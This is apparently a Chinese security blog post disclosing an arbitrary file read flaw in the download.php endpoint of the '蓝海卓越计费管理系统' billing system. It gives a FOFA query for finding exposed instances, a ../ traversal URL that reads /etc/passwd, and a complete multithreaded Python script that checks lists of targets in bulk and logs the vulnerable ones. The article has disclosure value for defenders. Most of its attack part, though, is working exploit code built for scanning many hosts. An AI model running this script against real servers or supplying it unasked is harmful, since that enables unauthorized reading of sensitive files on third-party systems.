蓝海卓越计费管理系统任意文件读取漏洞

本文涉及的产品
可观测可视化 Grafana 版,10个用户账号 1个月
函数计算FC,每月15万CU 3个月
容器镜像服务 ACR,镜像仓库100个 不限时长
简介: 蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 …/遍历目录可以读取到服务器上的敏感文件。

声明


请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、漏洞描述


  蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 …/遍历目录可以读取到服务器上的敏感文件。


二、漏洞复现


漏洞关键字搜索

FOFA:title =="蓝海卓越计费管理系统"image.png

漏洞位置:download.php?file=../../../../../etc/passwd

image.png

脚本检测

# -*- coding: utf-8 -*-

import argparse

import sys

import requests

from multiprocessing.dummy import Pool  # 表示的是多线程

requests.packages.urllib3.disable_warnings()

def banner():

   test = """

 

█████╗ ███╗   ██╗██╗   ██╗    ███████╗██╗██╗     ███████╗    ██████╗ ███████╗ █████╗ ██████╗  

██╔══██╗████╗  ██║╚██╗ ██╔╝    ██╔════╝██║██║     ██╔════╝    ██╔══██╗██╔════╝██╔══██╗██╔══██╗

███████║██╔██╗ ██║ ╚████╔╝     █████╗  ██║██║     █████╗      ██████╔╝█████╗  ███████║██║  ██║

██╔══██║██║╚██╗██║  ╚██╔╝      ██╔══╝  ██║██║     ██╔══╝      ██╔══██╗██╔══╝  ██╔══██║██║  ██║

██║  ██║██║ ╚████║   ██║       ██║     ██║███████╗███████╗    ██║  ██║███████╗██║  ██║██████╔╝

╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝       ╚═╝     ╚═╝╚══════╝╚══════╝    ╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚═════╝  

                                                                                           

                                                       tag:  An any file read poc

                                                       @version: 1.0.0

                                                       @author:  Nian-stars

   """

   print(test)

headers = {

   "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "

                 "Safari/537.36",

}

def poc(target):

   url = target + "/download.php?file=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" # 利用%2e来代替"."完成目录穿越

   try:

       res = requests.get(url, headers=headers, verify=False, timeout=5).text

       if "root" in res:

           print(f"[+] {target} is vulnerable!")

           with open("result.txt", "a+", encoding="utf-8") as f:

               f.write(target + "\n")

       else:

           print(f"[+] {target} is not vulnerable!")

   except:

       pass

def main():

   banner()

   parser = argparse.ArgumentParser(description='An any file read poc')

   parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com")

   parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt")

   args = parser.parse_args()

   if args.url and not args.file:

       poc(args.url)

   elif not args.url and args.file:

       url_list = []

       with open(args.file, "r", encoding="utf-8") as f:

           for url in f.readlines():

               url_list.append(url.strip().replace("\n", ""))

       mp = Pool(100)  # 表示的是线程数为100

       mp.map(poc, url_list)

       mp.close()

       mp.join()

   else:

       print(f"Usage:\n\t python3 {sys.argv[0]} -h")

if __name__ == '__main__':

   main()

image.png

目录
打赏
0
1
1
0
141
分享
相关文章
PHP代码审计(六)Seay源代码审计系统使用教程
www.cnseay.com/ 当然,这个已经不能访问了。 软件的版本比较早,需要.NET framework3.5框架,我这里是软件启动的时候自动提醒安装,如果没有自动提醒,那么你需要手动安装.NET frameWork3.5框架,否则,程序应该是没有办法运行。
1440 0
CVE-2021-41773|CVE-2021-42013——Apache HTTP Server路径遍历|远程代码执行
CVE-2021-41773|CVE-2021-42013——Apache HTTP Server路径遍历|远程代码执行
902 0
CVE-2021-41773|CVE-2021-42013——Apache HTTP Server路径遍历|远程代码执行
RabbitMQ 在微服务架构中的高级应用
【8月更文第28天】在微服务架构中,服务之间需要通过轻量级的通信机制进行交互。其中一种流行的解决方案是使用消息队列,如 RabbitMQ,来实现异步通信和解耦。本文将探讨如何利用 RabbitMQ 作为服务间通信的核心组件,并构建高效的事件驱动架构。
398 2
使用Python实现深度学习模型:智能电动车充电站优化
使用Python实现深度学习模型:智能电动车充电站优化
361 4
海康威视iVMS综合安防系统任意文件上传漏洞
海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实施对目标的攻击。
1056 1
浏览器版本过高导致无法访问网站 burpSuiteBrowser
浏览器版本过高导致无法访问网站 burpSuiteBrowser
257 0

云原生

+关注
AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等

登录插画

登录以查看您的控制台资源

管理云资源
状态一览
快捷访问